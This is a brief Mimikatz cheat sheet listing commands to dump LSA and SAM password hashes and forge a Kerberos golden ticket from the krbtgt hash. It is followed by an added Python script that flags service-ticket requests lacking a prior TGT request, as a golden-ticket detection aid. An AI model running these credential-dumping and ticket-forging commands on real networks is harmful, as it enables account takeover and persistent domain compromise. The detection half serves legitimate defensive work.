# Mimikatz Usage
* Check your privilege, boy
```sh
privilege::debug
```
## Dump hashes
* NTLM
```sh
lsadump::lsa /patch
```
## Dump Local Password hashes
```sh
token::elevate
```
```sh
lsadump::sam
```
## Golden ticket
* Dump the krbtgt hashes and create a ticket; the ticket is saved as ticket.kirbi
```sh
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:<userid> /domain:<domainname> /sid:<number behind domainname> /krbtgt:<NTLMhash> /id:<RID(dec)>
```
* Use the golden ticket: open a new elevated prompt
```sh
misc::cmd
```
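
A defender-side example for the golden ticket section above, added here and not part of the original cheat sheet: a forged TGT is never requested from the KDC, so service-ticket requests (event 4769) with no TGT request (4768) or renewal (4770) for the same account and client address are worth triaging. The JSON record layout, field names and sample events are constructed assumptions; the 10-hour lifetime is the Active Directory default.

```python
import json
from datetime import datetime, timedelta

# Constructed sample events (not real logs); the JSON layout is an assumption.
# 4768 = TGT requested, 4770 = ticket renewed, 4769 = service ticket requested.
SAMPLE_EVENTS = """
{"time":"2024-05-01T08:00:05","id":4768,"user":"alice","ip":"::ffff:10.0.0.21"}
{"time":"2024-05-01T08:00:09","id":4769,"user":"alice@CORP.EXAMPLE","ip":"::ffff:10.0.0.21","service":"cifs/fs01"}
{"time":"2024-05-01T09:14:40","id":4769,"user":"svc_backup@CORP.EXAMPLE","ip":"::ffff:10.0.0.77","service":"cifs/dc01"}
{"time":"2024-05-01T19:30:00","id":4769,"user":"alice@CORP.EXAMPLE","ip":"::ffff:10.0.0.21","service":"http/intranet"}
"""
TGT_EVENTS = {4768, 4770}


def normalize(user, ip):
    """4769 logs user@REALM and IPv4-mapped addresses; reduce both to one key."""
    if ip.startswith("::ffff:"):
        ip = ip[len("::ffff:"):]
    return user.split("@")[0].lower(), ip


def find_orphan_service_requests(lines, tgt_lifetime=timedelta(hours=10)):
    """Return 4769 events that have no plausible TGT issuance behind them."""
    events = sorted((json.loads(l) for l in lines if l.strip()),
                    key=lambda e: e["time"])
    last_tgt, findings = {}, []
    for e in events:
        key = normalize(e["user"], e["ip"])
        when = datetime.fromisoformat(e["time"])
        if e["id"] in TGT_EVENTS:
            last_tgt[key] = when          # remember the latest issuance/renewal
        elif e["id"] == 4769:
            issued = last_tgt.get(key)
            if issued is None:
                reason = "no TGT request seen"
            elif when - issued > tgt_lifetime:
                reason = "last TGT request older than ticket lifetime"
            else:
                continue                  # covered by a recent TGT
            findings.append((e["time"], key[0], key[1], e["service"], reason))
    return findings


if __name__ == "__main__":
    for finding in find_orphan_service_requests(SAMPLE_EVENTS.splitlines()):
        print(finding)
```

TGTs issued before the collected log window, or by a domain controller whose logs are missing, show up as false positives, so feed it events from every DC.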